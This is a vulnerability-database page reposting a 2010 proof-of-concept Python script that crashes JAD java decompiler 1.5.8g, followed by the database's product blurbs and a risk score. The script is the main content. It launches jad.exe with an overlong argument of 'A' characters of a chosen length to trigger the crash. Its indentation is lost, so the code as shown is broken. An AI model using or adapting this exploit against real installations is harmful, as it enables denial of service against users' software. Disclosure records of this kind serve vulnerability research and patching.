Lucene search
K

JAD java decompiler 1.5.8g (argument) Local Crash Vulnerability

🗓️ 09 Mar 2010 00:00:00Reported by l3DType 
zdt
 zdt
🔗 0day.today👁 18 Views

JAD java decompiler 1.5.8g Local Crash Vulnerabilit

Code
===============================================================
JAD java decompiler 1.5.8g (argument) Local Crash Vulnerability
===============================================================

#!/usr/bin/env python
#JAD java decompiler 1.5.8g (argument) Local Crash
#Tested on Windows
#Software Link: http://www.varaneckas.com/jad
#Author: l3D

#The software crashes when it gets an argument that is between 0x1fc9 to 0x1fdc bytes.
 
from random import randint
import os, sys
 
if len(sys.argv) != 1:
path=sys.argv[1]
else:
path='jad.exe'
 
if not os.path.exists(path):
print 'Usage: python %s [path to jad.exe]' % sys.argv[0]
exit(-1)
 
evil='A'*randint(0x1fc9, 0x1fdc)
os.execl(path, path, evil)



#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Mar 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
18